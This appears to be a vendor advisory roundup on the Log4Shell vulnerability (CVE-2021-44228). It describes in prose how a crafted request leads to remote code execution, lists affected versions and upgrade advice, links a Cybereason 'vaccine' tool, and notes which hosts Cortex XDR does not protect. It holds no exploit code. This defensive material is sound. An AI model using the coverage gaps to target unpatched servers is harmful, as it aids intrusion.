Här kan ni hitta en sammanställning över länkar från leverantörer med information kring Log4J (CVE-2021-44228)
Have provided some queries for finding software using Log4j -> https://www.axonius.com/blog/tracking-log4shell-and-related-applications-with-axonius
The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled – this effectively blocks any further attempt to exploit Log4Shell on this server.
Link about the “vaccine”: https://github.com/Cybereason/Logout4Shell
Cybereason is aware of the vulnerability and has completed verification that this issue does not affect Cybereason products or services.
A remote code execution (RCE) vulnerability in Apache log4j2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.
Affected Version: Apache Log4j 2.x <= 2.15.0-rc1
See the Unit 42 threat brief for additional details on the attack, product updates, and courses of action.
BEST PRACTICE: Palo Alto Networks strongly recommends that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.
The Cortex XDR research team has investigated the above vulnerability and we are happy to announce that Cortex XDR linux agent running on version 7.0 and above, will block the known POCs our research team investigated of CVE-2021-44228*.
To ensure you are receiving alerts and monitoring any exploitation attempts:
*Notice that alpine environments using musl instead of libc are not covered by the java deserialization module and have coverage of some post-exploitation techniques leveraging this exploit using Behavioral Threat Prevention. Scanning attempts will not be prevented, only a full exploit chain. SElinux enabled or permissive mode hosts do not have the Java Deserialization Module and are not protected.